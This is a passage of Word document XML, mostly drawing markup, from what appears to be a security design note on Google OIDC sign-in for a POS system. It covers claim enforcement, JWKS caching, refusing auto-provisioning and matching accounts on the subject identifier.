              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00674944">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wpg">
                  <w:drawing>
                    <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251826176" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="48C3F178" wp14:editId="20136A3A">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>80963</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>-23650</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="171450" cy="142875"/>
                      <wp:effectExtent l="0" t="0" r="0" b="0"/>
                      <wp:wrapNone/>
                      <wp:docPr id="30145" name="Group 30145"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                          <wpg:wgp>
                            <wpg:cNvGrpSpPr/>
                            <wpg:grpSpPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="171450" cy="142875"/>
                                <a:chOff x="0" y="0"/>
                                <a:chExt cx="171450" cy="142875"/>
                              </a:xfrm>
                            </wpg:grpSpPr>
                            <wps:wsp>
                              <wps:cNvPr id="2699" name="Shape 2699"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="171450" cy="142875"/>
                                </a:xfrm>
                                <a:custGeom>
                                  <a:avLst/>
                                  <a:gdLst/>
                                  <a:ahLst/>
                                  <a:cxnLst/>
                                  <a:rect l="0" t="0" r="0" b="0"/>
                                  <a:pathLst>
                                    <a:path w="171450" h="142875">
                                      <a:moveTo>
                                        <a:pt x="9525" y="0"/>
                                      </a:moveTo>
                                      <a:lnTo>
                                        <a:pt x="161925" y="0"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="164555" y="0"/>
                                        <a:pt x="166800" y="930"/>
                                        <a:pt x="168660" y="2778"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="170520" y="4638"/>
                                        <a:pt x="171450" y="6896"/>
                                        <a:pt x="171450" y="9525"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="171450" y="133350"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="171450" y="135967"/>
                                        <a:pt x="170520" y="138212"/>
                                        <a:pt x="168660" y="140072"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="166800" y="141932"/>
                                        <a:pt x="164555" y="142863"/>
                                        <a:pt x="161925" y="142875"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="9525" y="142875"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="6895" y="142863"/>
                                        <a:pt x="4650" y="141932"/>
                                        <a:pt x="2790" y="140072"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="930" y="138212"/>
                                        <a:pt x="0" y="135967"/>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0145" style="width:13.5pt;height:11.25pt;position:absolute;z-index:-2147483433;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:6.375pt;mso-position-vertical-relative:text;margin-top:-1.8623pt;" coordsize="1714,1428">
                      <v:shape id="Shape 2699" style="position:absolute;width:1714;height:1428;left:0;top:0;" coordsize="171450,142875" path="m9525,0l161925,0c164555,0,166800,930,168660,2778c170520,4638,171450,6896,171450,9525l171450,133350c171450,135967,170520,138212,168660,140072c166800,141932,164555,142863,161925,142875l9525,142875c6895,142863,4650,141932,2790,140072c930,138212,0,135967,0,133350l0,9525c0,6896,930,4638,2790,2778c4650,930,6895,0,9525,0x">
                        <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                        <v:fill on="true" color="#edf2f6"/>
                      </v:shape>
                    </v:group>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00674944">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>hd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8111"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45F2B4F" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="00674944" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="3" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00674944">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Enforced on the claim, not the request parameter — that parameter is only a hint to Google's account </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00674944">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>chooser</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00674944">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> and the user can simply delete it from the URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5DC936D4" w14:textId="500B526C" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="321"/>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JWKS is cached for an hour because Google rotates those keys; a hard-coded copy would break sign-in at the next rotation. A fetch failure does </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> fall back to a stale key set failing sign-in beats verifying against keys that may have been revoked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B494FBD" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>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6.5 No auto-provisioning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1684CEA5"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A Google account with no matching staff record is </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>refused with 403</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. Creating one automatically would recreate V-01 with extra steps: anyone with a Google account could sign up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF84044" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="166" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="43"/>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27200" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="23DF008C" wp14:editId="3D24CDA8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2666107</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>162607</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="581025" cy="133350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="31286" name="Group 31286"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="581025" cy="133350"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="581025" cy="133350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2718" name="Shape 2718"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="581025" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="581025" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="571500" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="574131" y="0"/>
                                  <a:pt x="576376" y="918"/>
                                  <a:pt x="578235" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="580095" y="4638"/>
                                  <a:pt x="581025" y="6883"/>
                                  <a:pt x="581025" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="581025" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="581025" y="126454"/>
                                  <a:pt x="580095" y="128687"/>
                                  <a:pt x="578235" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="576376" y="132407"/>
                                  <a:pt x="574131" y="133338"/>
                                  <a:pt x="571500" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133338"/>
                                  <a:pt x="4650" y="132407"/>
                                  <a:pt x="2790" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128687"/>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86" style="width:45.75pt;height:10.5pt;position:absolute;z-index:-2147483414;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:209.93pt;mso-position-vertical-relative:text;margin-top:12.8037pt;" coordsize="5810,1333">
                <v:shape id="Shape 2718" style="position:absolute;width:5810;height:1333;left:0;top:0;" coordsize="581025,133350" path="m9525,0l571500,0c574131,0,576376,918,578235,2778c580095,4638,581025,6883,581025,9525l581025,123825c581025,126454,580095,128687,578235,130547c576376,132407,574131,133338,571500,133350l9525,133350c6895,133338,4650,132407,2790,130547c930,128687,0,126454,0,123825l0,9525c0,6883,930,4638,2790,2778c4650,918,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 xml:space="preserve">Google answers "who is this person". It has no opinion on whether they work here, and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>none at all</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> on whether they are an administrator.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Role, department and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>is_active</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> are never read from the token.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C676F9" w14:textId="5D65E8E0" w:rsidR="00345BB3"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28224" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="47F274DB" wp14:editId="3B79D2B2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>818257</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-18964</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="581025" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="31287" name="Group 31287"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="581025" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="581025" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2722" name="Shape 2722"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="581025" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="581025" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="571500" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="574130" y="0"/>
                                  <a:pt x="576375" y="930"/>
                                  <a:pt x="578235" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="580095" y="4638"/>
                                  <a:pt x="581025" y="6896"/>
                                  <a:pt x="581025" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="581025" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="581025" y="135979"/>
                                  <a:pt x="580095" y="138212"/>
                                  <a:pt x="578235" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="576375" y="141932"/>
                                  <a:pt x="574130" y="142863"/>
                                  <a:pt x="571500"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87" style="width:45.75pt;height:11.25pt;position:absolute;z-index:-2147483410;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:64.4297pt;mso-position-vertical-relative:text;margin-top:-1.49329pt;" coordsize="5810,1428">
                <v:shape id="Shape 2722" style="position:absolute;width:5810;height:1428;left:0;top:0;" coordsize="581025,142875" path="m9525,0l571500,0c574130,0,576375,930,578235,2778c580095,4638,581025,6896,581025,9525l581025,133350c581025,135979,580095,138212,578235,140072c576375,141932,574130,142863,571500,142875l9525,142875c6895,142863,4650,141932,2790,140072c930,138212,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29248" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4B94C809" wp14:editId="25CAE527">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1999357</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-18964</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="228600" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="31288" name="Group 31288"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="228600" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="228600" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2725" name="Shape 2725"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="228600" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="228600" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="219075" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="221705" y="0"/>
                                  <a:pt x="223950" y="930"/>
                                  <a:pt x="225810" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="227670" y="4638"/>
                                  <a:pt x="228600" y="6896"/>
                                  <a:pt x="228600" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="228600" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="228600" y="135979"/>
                                  <a:pt x="227670" y="138212"/>
                                  <a:pt x="225810" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="223950" y="141932"/>
                                  <a:pt x="221705" y="142863"/>
                                  <a:pt x="219075" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142863"/>
                                  <a:pt x="4650" y="141932"/>
                                  <a:pt x="2790" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138212"/>
                                  <a:pt x="0" y="135979"/>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31288" style="width:18pt;height:11.25pt;position:absolute;z-index:-2147483407;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:157.43pt;mso-position-vertical-relative:text;margin-top:-1.49329pt;" coordsize="2286,1428">
                <v:shape id="Shape 2725" style="position:absolute;width:2286;height:1428;left:0;top:0;" coordsize="228600,142875" path="m9525,0l219075,0c221705,0,223950,930,225810,2778c227670,4638,228600,6896,228600,9525l228600,133350c228600,135979,227670,138212,225810,140072c223950,141932,221705,142863,219075,142875l9525,142875c6895,142863,4650,141932,2790,140072c930,138212,0,135979,0,133350l0,9525c0,6896,930,4638,2790,2778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color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Matching is on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>google_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the OIDC </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sub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t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>first</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, then email. The subject is the stable identifier; an email address can be changed, or in a Workspace domain reassigned to a different person </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>entirely  matching</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> on address alone would hand the previous holder's POS account to whoever inherits it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD3ABFA" w14:textId="77777777" w:rsidR="00674944" w:rsidRPr="005C54CB" w:rsidRDefault="00674944">
      <w:pPr>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65CF1B7A" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="24"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>6.6 Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555DFC3F" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="330" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="29" w:firstLine="0"/>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inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73C5C183" wp14:editId="049DAF36">
                <wp:extent cx="6480126" cy="2266950"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="29755" name="Group 29755"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6480126" cy="2266950"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6480126" cy="2266950"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2743" name="Shape 2743"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6480126" cy="2266950"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="6480126" h="2266950">
                                <a:moveTo>
                                  <a:pt x="19050" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="6467474" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6470001" y="0"/>
                                  <a:pt x="6472430" y="484"/>
                                  <a:pt x="6474764" y="1439"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="6480126" y="5022"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6480126" y="2261904"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6474764" y="2265487"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6472430" y="2266454"/>
                                  <a:pt x="6470001" y="2266938"/>
                                  <a:pt x="6467474" y="2266950"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="19050" y="2266950"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="16524" y="2266938"/>
                                  <a:pt x="14094" y="2266454"/>
                                  <a:pt x="11760" y="2265487"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="9426" y="2264507"/>
                                  <a:pt x="7366" y="2263143"/>
                                  <a:pt x="5580" y="2261357"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="3793" y="2259571"/>
                                  <a:pt x="2417" y="2257500"/>
                                  <a:pt x="1450" y="2255180"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="2247900"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="19050"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1450" y="11745"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="2417" y="9401"/>
                                  <a:pt x="3793" y="7342"/>
                                  <a:pt x="5580" y="5569"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="7366" y="3770"/>
                                  <a:pt x="9426" y="2394"/>
                                  <a:pt x="11760" y="1439"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="14094" y="471"/>
                                  <a:pt x="16524" y="0"/>
                                  <a:pt x="19050" y="0"/>
                                </a:cubicBezTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="flat">
                            <a:miter lim="127000"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000">
                              <a:alpha val="0"/>
                            </a:srgbClr>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="102B46"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
